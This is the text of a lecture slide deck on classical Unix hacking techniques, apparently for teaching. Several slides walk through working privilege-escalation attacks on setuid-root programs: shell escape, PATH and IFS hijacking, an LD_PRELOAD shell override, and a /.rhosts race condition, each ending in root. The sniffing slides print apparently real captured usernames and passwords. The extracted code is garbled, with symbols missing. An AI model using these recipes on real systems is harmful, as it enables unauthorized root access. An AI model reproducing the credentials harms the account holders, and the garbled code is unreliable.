Classical Hacking technique

1
Classical Hacking technique

• Taeho Oh
• http//postech.edu/ohhara
• ohhara_at_postech.edu

2
Contents (1)

• Physical attack
• Social engineering
• Shell escape
• PATH attack
• IFS attack
• LD_PRELOAD attack
• Race condition

3
Contents (2)

• Buffer overflow
• Sniff
• IP Spoof
• Misconfiguration

4
Physical attack

• Search password in admins desk
• Steal a hard disk or a computer
• Break door with a hammer

5
Social engineering

• Ask admin admins password
• Send email, which tells to change the password,
  to all users

6
Shell escape (1)

• Try to get the shell from program by using shell
  escape character
• Ex) , ! ( ) . . .

7
Shell escape (2)
ohhara_at_ohhara 1 cat ex_finger.c include
ltstdio.hgt includeltstdlib.hgt includeltunistd.hgt m
ain(int argc,char argv) char
cmd100 setuid(0) setgid(0)
8
Shell escape (3)
if(argcgt1) sprintf(cmd,"/usr/bin/finger
s",argv1) system(cmd) ohhara_at_ohhara
2 ls -l ex_finger ---s--x--x 1 root
root 22961 Jan 3 1933 ex_finger
9
Shell escape (4)
ohhara_at_ohhara 3 ./ex_finger
'bin/bin/sh' Login name bin Directory
/usr/bin Never logged in. Mail last read Fri Dec
31 175028 1999 No Plan. whoami root
Execute /usr/bin/finger bin/bin/sh
10
PATH attack (1)

• PATH is executable program search path
• PATH can be changed by the hacker

11
PATH attack (2)
ohhara_at_ohhara 1 cat ex_who.c includeltst
dlib.hgt includeltunistd.hgt main()
setuid(0) setgid(0)
system("who") ohhara_at_ohhara 2 ls -l
ex_who ---s--s--x 1 root root 3136
Mar 6 1729 ex_who
12
PATH attack (3)
ohhara_at_ohhara 3 cat who !/bin/sh /bin/s
h ohhara_at_ohhara 4 PATH.PATH
ohhara_at_ohhara 5 export PATH
ohhara_at_ohhara 6 ./ex_who whoami root
Execute not /usr/bin/who but ./who
13
IFS attack (1)

• IFS is Internal Field Separator
• Command argument is separated by IFS value
• Default IFS value is
• Ex)
• ls al -gt ls -al ( IFS )
• ls/-al -gt ls -al ( IFS / )

14
IFS attack (2)
ohhara_at_ohhara 1 cat ex_date.c includelts
tdlib.hgt includeltunistd.hgt main() setuid(0)
setgid(0) system("/bin/date")
ohhara_at_ohhara 2 ls -l ex_date ---s--x--x
1 root root 22811 Jan 3 2119
ex_date
15
IFS attack (3)
ohhara_at_ohhara 3 cat bin !/bin/sh IFS'
' export IFS /bin/sh ohhara_at_ohhara 4
IFS/ ohhara_at_ohhara 5 export IFS
ohhara_at_ohhara 6 PATH.PATH
ohhara_at_ohhara 7 export PATH
16
IFS attack (4)
ohhara_at_ohhara 8 ./ex_date
whoami root
Execute not /bin/date but bin date
17
LD_PRELOAD attack (1)

• LD_LIBRARY_PATH is dynamic link library path
• LD_PRELOAD is dynamic link library path which is
  loaded before LD_LIBRARY_PATH is loaded

18
LD_PRELOAD attack (2)
ohhara_at_ohhara 1 cat ex_print.c includelt
stdio.hgt includeltunistd.hgt main() setuid(0)
setgid(0) printf("hello!\n") ohhara_at_ohhara
2 ls -l ex_print ---s--x--x 1 root
root 4290 Jan 3 2148 ex_print
19
LD_PRELOAD attack (3)
ohhara_at_ohhara 3 cat ex_print_so.c void
printf(char str) execl("/bin/sh","sh",0)
ohhara_at_ohhara 4 gcc shared o
ex_print_so.so ex_print_so.c ohhara_at_ohhara
5 LD_PRELOAD./ex_print_so.so ohhara_at_ohhara
6 export LD_PRELOAD
20
LD_PRELOAD attack (4)
ohhara_at_ohhara 7 ./ex_print
whoami root
21
Race condition (1)

• Race condition is occurred when two or more
  processes try to use one resource
• Race condition of UNIX security is occurred in
  the file system.

22
Race condition (2)
access(good,W_OK)
Open(good,O_WRONLY)
Normal process
Write to not good but /.rhosts
Attack process
Remove good Link good to /.rhosts
23
Race condition (3)
ohhara_at_ohhara 1 cat ex_race.c includelts
tdio.hgt includeltunistd.hgt includeltfcntl.hgt main(
) int fd char data" \n" setuid(0) set
gid(0)
24
Race condition (4)
if(access("good",W_OK)0) sleep(3) fdop
en("good",O_WRONLYO_TRUNCO_CREAT) write(fd,da
ta,4) close(fd) ohhara_at_ohhara 2
ls -l ex_race ---s--x--x 1 root root
4728 Jan 4 1323 ex_race
25
Race condition (5)
ohhara_at_ohhara 3 ls l /.rhosts ls
/.rhosts No such file or directory
ohhara_at_ohhara 4 touch good
ohhara_at_ohhara 5 ./ex_race ln -sf
/.rhosts good ohhara_at_ohhara 6 cat
/.rhosts ohhara_at_ohhara 7 rlogin l
root localhost whoami root
26
Buffer overflow (1)

• Write unexpected memory area by overflowing
  buffer
• The most famous hacking technique
• Almost all cases, buffer overflow means stack
  buffer overflow
• Recently, heap buffer overflow attack is
  introduced

27
Buffer overflow (2)

• Hackers can execute arbitrary command by
  overflowing buffer
• Machine and OS dependent hacking technique
• This topic will be discussed later

28
Sniff (1)

• Ethernet broadcasts to transmit data
• Hackers can see all network packets in the
  ethernet
• Network packets contains user id, password, and
  other useful information
• The Easiest and the most powerful hacking
  technique

29
Sniff (2)
Normal network packet
Broadcasted network packet
Hacker can see network packet
30
Sniff (3)
whoami root hostname gdt.postech.ac.kr
31
Sniff (4)
cat tcp.log cogs.postech.ac.kr gt
mx1.postech.ac.kr 110 USER nllbut PASS
cjPpS! UIDL STAT QUIT ----- FIN
32
Sniff (5)
211.33.152.182 gt monsky.postech.ac.kr 23
'vt100!ohhara zXfYpZgAd/! ----- Timed
Out
33
IP spoof

• Hackers can spoof their IP address
• Hackers try to connect to rsh, rlogin services
  with spoofed IP address
• Hackers have to know the next sequence number to
  open TCP session with spoofed IP address
• This topic will be discussed later

34
Misconfiguration

• Hackers search for admins mistake
• Ex)
• Null/simple password account
• Everyone nfs export
• Writable ftp home directory
• Opened x window display